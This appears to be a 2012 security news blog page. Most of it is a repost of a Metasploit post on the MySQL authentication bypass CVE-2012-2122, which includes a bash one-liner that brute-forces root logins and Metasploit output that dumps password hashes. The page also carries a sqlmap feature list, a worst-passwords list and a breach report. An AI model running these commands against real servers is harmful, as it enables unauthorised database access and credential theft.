Information Security | Data story

See where the network attacks against Luxembourg come from

See the locations of the network attacks against Luxembourg on CIRCL's map: http://map.circl.lu/

http://www.circl.lu/

CIRCL (Computer Incident Response Center Luxembourg) is the national Computer Security Incident Response Team (CSIRT – CERT) coordination center for the Grand-Duchy of Luxembourg.

CIRCL is operated by SMILE (“security made in Lëtzebuerg”), a State funded “groupement d’intérêt économique” (GIE), designed to improve information security and create new opportunities for Luxembourg.

The InfoWorld technology of the year 2013

InfoWorld has just published its Technology of the Year Award winners, and some well-known NoSQL solutions are among them:

  • Apache Hadoop
  • Apache Cassandra
  • Couchbase Server

http://www.infoworld.com/slideshow/80986/infoworlds-2013-technology-of-the-year-award-winners-210419#slide1

“NoSQL, no security?”

“NoSQL, no security?” is a presentation from AppSec USA 2012, Austin, Texas.

Presented by Will Urbanski (@willurbanski)

Welcome the 25 worst passwords of 2012

SplashData, which makes password management applications, has released its annual “Worst Passwords” list compiled from common passwords that are posted by hackers. The top three — “password,” “123456,” and “12345678” — have not changed since last year. New ones include “jesus,” “ninja,” “mustang,” “password1,” and “welcome.” Other passwords have moved up and down on the list.

The most surprising addition is probably “welcome.”

“That means people are not even changing default passwords,” CEO Morgan Slain told TIME Tech. “It doesn’t take that much time to make a new password.”


Here’s the full list:

1. password
2. 123456
3. 12345678
4. abc123
5. qwerty
6. monkey
7. letmein
8. dragon
9. 111111
10. baseball
11. iloveyou
12. trustno1
13. 1234567
14. sunshine
15. master
16. 123123
17. welcome
18. shadow
19. ashley
20. football
21. jesus
22. michael
23. ninja
24. mustang
25. password1

Hack.lu 2012

Hack.lu is an open convention/conference where people can discuss computer security, privacy, information technology and its cultural/technical implications for society.

The aim of the convention is to build a bridge between the various actors in the computer security world.

The conference takes place:

  1. at Parc Hotel Alvisse in Luxembourg

  2. on 23-25 October 2012

Some of the invited talks and workshops are now announced (follow this link for more details).

Mozilla launching Persona – decentralized and secure authentication system

Everyone has agreed for quite a long time now: the password problem is the single most frustrating and alienating issue for normal users.

Mozilla is launching an ambitious project, code-named Persona, to solve this problem for good, and since the solution is, technically speaking, simple and elegant, it might really be the long-awaited answer.

Mozilla Persona is a completely decentralized and secure authentication system for the web based on the open BrowserID protocol. To ensure that Persona works everywhere and for everyone, Mozilla currently operates a small suite of optional, centralized services related to Persona.

Why should you and your site use Persona?

  1. Persona completely eliminates site-specific passwords, freeing users and websites from the burden of creating, managing, and securely storing passwords.
  2. Persona is easy to use. With just two clicks a Persona user can sign into a new site like Voost or The Times Crossword, bypassing the friction associated with account creation.
  3. Persona is easy to implement. Developers can add Persona to a site in a single afternoon.
  4. Best of all, there’s no lock-in. Developers get a verified email address for all of their users, and users can use any email address with Persona.
  5. Persona is built on the BrowserID protocol. Once popular browser vendors implement BrowserID, they will no longer need to rely on Mozilla to log in.

Read on to get started!

More information:

https://developer.mozilla.org/en-US/docs/Persona

Bootstrapping Persona

sqlmap: an automatic SQL injection and database takeover tool

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features:

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate database users, users’ password hashes, users’ privileges, users’ roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  • Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

Download:

You can download the latest tarball by clicking here.

Preferably, you can download sqlmap by cloning the Git repository:

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

CVE-2012-2122: A Tragically Comedic Security Flaw in MySQL

Posted by HD Moore in Metasploit on Jun 11, 2012 12:51:25 AM

Introduction

On Saturday afternoon Sergei Golubchik posted to the oss-sec mailing list about a recently patched security flaw (CVE-2012-2122) in the MySQL and MariaDB database servers. This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -128 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.


In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

mysql>


Exploitability

Although a wide range of MySQL and MariaDB versions use the vulnerable code, only some of these systems are exploitable. It boils down to whether the memcmp() routine returns values outside of the unsigned character range. According to Sergei, this is normally not the case, and the routine is normally compiled into the server as an inline function. The major exception is when GCC uses SSE optimization. Joshua Drake, a security researcher with Accuvant Labs, provided a sample application that can determine whether your system might be affected. On most systems, the results of this application match the MySQL package provided by the distribution, but the only way to be sure is to actually test it.
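As an added illustration of the flaw described in the introduction and of the kind of self-check mentioned above (my own code, not MySQL's source, not Metasploit's, and not Joshua Drake's application): the program below simulates an optimised memcmp that reports 32-bit lane differences, which is an assumption standing in for the SSE behaviour the post describes. It shows the narrowing comparison accepting a wrong hash whose difference is a multiple of 256, the hardened comparison rejecting the same hash, and finally probes the real memcmp of the platform it is compiled on. The names wide_memcmp, check_scramble_truncating, check_scramble_fixed and platform_memcmp_exceeds_char_range are mine; the my_bool typedef mirrors the one-byte type the post's description implies.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SHA1_HASH_SIZE 20   /* the scramble MySQL compares is SHA-1 sized */

/* Simulated optimised memcmp (an assumption, neither libc's nor MySQL's code):
 * like the SSE routines the post mentions, it reports the difference of two
 * 32-bit lanes rather than two bytes, so the result can be any int. It still
 * returns 0 exactly when the buffers are equal. */
static int wide_memcmp(const void *a, const void *b, size_t n)
{
    const unsigned char *pa = a, *pb = b;
    size_t i = 0;
    for (; i + 4 <= n; i += 4) {
        uint32_t la, lb;
        memcpy(&la, pa + i, sizeof la);
        memcpy(&lb, pb + i, sizeof lb);
        if (la != lb)
            return (int32_t)(la - lb);      /* e.g. 256 or -256 */
    }
    for (; i < n; i++)
        if (pa[i] != pb[i])
            return (int)pa[i] - (int)pb[i];
    return 0;
}

/* Vulnerable shape from the post: the result travels through a one-byte type
 * (MySQL's my_bool is a char) and is only then tested for zero, so every
 * difference that is a multiple of 256 narrows to 0, i.e. "password matches". */
typedef char my_bool;

static my_bool check_scramble_truncating(const unsigned char *stored,
                                         const unsigned char *computed)
{
    return wide_memcmp(stored, computed, SHA1_HASH_SIZE);   /* 0 == match */
}

/* Fixed shape: reduce to a real boolean before anything can narrow it. */
static bool check_scramble_fixed(const unsigned char *stored,
                                 const unsigned char *computed)
{
    return wide_memcmp(stored, computed, SHA1_HASH_SIZE) == 0;
}

/* Constructed case: hashes differing only in byte 1, so the first lane differs
 * by exactly 256 (or 65536 on a big-endian host; the low byte is 0 either way).
 * True when the truncating check accepts what the fixed one rejects. */
static bool wrong_hash_slips_through(void)
{
    unsigned char stored[SHA1_HASH_SIZE] = {0}, computed[SHA1_HASH_SIZE] = {0};
    computed[1] = 0x01;
    return check_scramble_truncating(stored, computed) == 0 &&
           !check_scramble_fixed(stored, computed);
}

/* Probe in the spirit of the self-test the post points to (my own, not that
 * program): hand the platform's real memcmp many differing buffers and report
 * whether any result leaves -128..127. True means narrowing a memcmp result is
 * unsafe on this build; the answer is platform and compiler dependent. */
static bool platform_memcmp_exceeds_char_range(void)
{
    unsigned char a[64], b[64];
    for (unsigned pattern = 1; pattern < 2048; pattern++) {
        for (size_t i = 0; i < sizeof a; i++) {
            a[i] = (unsigned char)(pattern * 31 + i);
            b[i] = (unsigned char)(pattern * 17 + 3 * i + 1);
        }
        for (size_t len = 1; len <= sizeof a; len++) {
            int r = memcmp(a, b, len);
            if (r < -128 || r > 127)
                return true;
        }
    }
    return false;
}

int main(void)
{
    printf("wrong hash accepted by the truncating check: %s\n",
           wrong_hash_slips_through() ? "yes" : "no");
    printf("this platform's memcmp exceeds the char range: %s\n",
           platform_memcmp_exceeds_char_range() ? "yes" : "no");
    return 0;
}
```

The probe's answer is platform dependent, and a "no" is not proof of safety, since an optimised memcmp may only be selected for particular lengths or alignments. The durable fix is the one in check_scramble_fixed: never let a memcmp result pass through a narrower type before it is tested against zero.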


If you’d like to give this a try yourself, download Metasploit now for free.


So far, the following systems have been confirmed as vulnerable:

  • Ubuntu Linux 64-bit ( 10.04, 10.10, 11.04, 11.10, 12.04 ) ( via many including @michealc )
  • OpenSuSE 12.1 64-bit MySQL 5.5.23-log ( via @michealc )
  • Debian Unstable 64-bit 5.5.23-2 ( via @derickr )
  • Fedora ( via hexed and confirmed by Red Hat )
  • Arch Linux (unspecified version)


Feedback so far indicates the following platforms are NOT vulnerable:

  • Official builds from MySQL and MariaDB (including Windows)
  • Red Hat Enterprise Linux 4, 5, and 6 (confirmed by Red Hat)
  • CentOS using official RHEL rpms
  • Ubuntu Linux 32-bit (10.04, 11.10, 12.04, likely all)
  • Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
  • Debian Linux lenny 32-bit 5.0.51a-24+lenny5 ( via @matthewbloch )
  • Debian Linux lenny 64-bit 5.0.51a-24+lenny5 ( via @matthewbloch )
  • Debian Linux lenny 64-bit 5.1.51-1-log ( via @matthewbloch )
  • Debian Linux squeeze 64-bit 5.1.49-3-log ( via @matthewbloch )
  • Debian Linux squeeze 32-bit 5.1.61-0+squeeze1 ( via @matthewbloch )
  • Debian Linux squeeze 64-bit 5.1.61-0+squeeze1 ( via @matthewbloch )
  • Gentoo 64-bit 5.1.62-r1 ( via @twit4c )
  • SuSE 9.3 i586 MySQL 4.1.10a ( via @twit4c )
  • OpenIndiana oi_151a4 5.1.37 ( via @TamberP )
  • FreeBSD 64-bit (many versions)


Most Linux vendors should have a patch out soon, if not already.


Caveats and Defense

The first rule of securing MySQL is to not expose it to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control.

If you are responsible for a MySQL server that is currently exposed to the network unnecessarily, the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the “bind-address” parameter to “127.0.0.1”. Restart the MySQL service to apply this setting.


Real-world Version Information

Pulling from the resources of a personal side project, I was able to derive some statistics about the real-world impact of this vulnerability. This project managed to find and gather the initial handshake for approximately 1.74 million MySQL servers across the internet at large. This statistic only includes MySQL instances that were on hosts publicly exposed to the internet and not bound to localhost.


Host Access Control

Of the 1.74 million MySQL servers identified, slightly more than 50% did not enforce host-based access controls ( 879,046 vs 863,920 ). The data was gathered by scanning randomly generated IPs across the entire addressable IPv4 unicast range, excluding networks known to be “dark” or where the network administrators had opted out of the survey.


MySQL Version Numbers

If we break down the list of accessible servers by version, we can see that the 5.0.x version series accounts for over 356,000 of the entire set, followed by 285,000 running a 5.1.x version, and 134,436 running a 5.5.x version. Doing the same type of analysis on the build flavor highlights how easy it is to identify Ubuntu (43,900), Debian (6,408), and Windows (98,665) MySQL services from the banners alone. Knowing that most Ubuntu 64-bit builds are likely to be vulnerable, the real question is how many of those nearly 44,000 Ubuntu systems are running 64-bit editions of the operating system.


Making the Most of It

If you are approaching this issue from the perspective of a penetration tester, this will be one of the most useful MySQL tricks for some time to come. One feature of Metasploit you should be familiar with is the mysql_hashdump module. This module uses a known username and password to access the master user table of a MySQL server and dump it into a locally-stored “loot” file. This can be easily cracked using a tool like John the Ripper, providing clear-text passwords that may provide further access.


This evening Jonathan Cran (CTO of Pwnie Express and Metasploit contributor) committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes. A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.


msfconsole

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf  auxiliary(mysql_authbypass_hashdump) > set USERNAME root

msf  auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1

msf  auxiliary(mysql_authbypass_hashdump) > run


[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test

[*] 127.0.0.1:3306 Authentication bypass is 10% complete

[*] 127.0.0.1:3306 Authentication bypass is 20% complete

[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts

[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes…

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89

[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

50 GB of old credit card customer details

A 50 GB dump file of names, addresses, emails and phone numbers of credit card customers around the world released on Monday indicates a breach of a payment processor, but the data appears to be old.

A hacker nicknamed “Reckz0r” posted a link to the data dump on Pastebin, also writing on Twitter that he had “penetrated over 79 large banks” and holds 50GB of data on MasterCard and Visa cardholders. No card numbers were released, however.

MasterCard and Visa, which are aware of the breach, do not actually hold information on individual cardholders. That information is held by banks, as well as the many companies involved in processing credit-card transactions.

Attempts to reach some of the U.S. cardholders affected were unsuccessful, since many of the phone numbers were disconnected or incorrect.

But another person in the list, Sydney resident Julian Bale, said the information was very old. The home address published for him is seven years out of date, and an e-mail address published at least four years old, Bale said in a phone interview Tuesday.

HaxoGreen 2012 starting next July 26th

HaxoGreen 2012 is the third iteration of the annual four-day outdoor camp in early summer 2012 organized by syn2cat. This rather informal and cosy hacker camp takes place from July 26th – 29th 2012.

The camp is organized by the community around Luxembourg’s hacker community syn2cat. We appreciate your participation, be it by holding a lecture, a workshop or presenting your projects and ideas during a 10-minute lightning talk.

More information

Location

The camp is located at the scouts’ ground Belvedère near the city of Dudelange in the southern region of Luxembourg/Europe. The camping ground features adequate restrooms and shower facilities. Indoor rooms for lectures and workshops are also available.
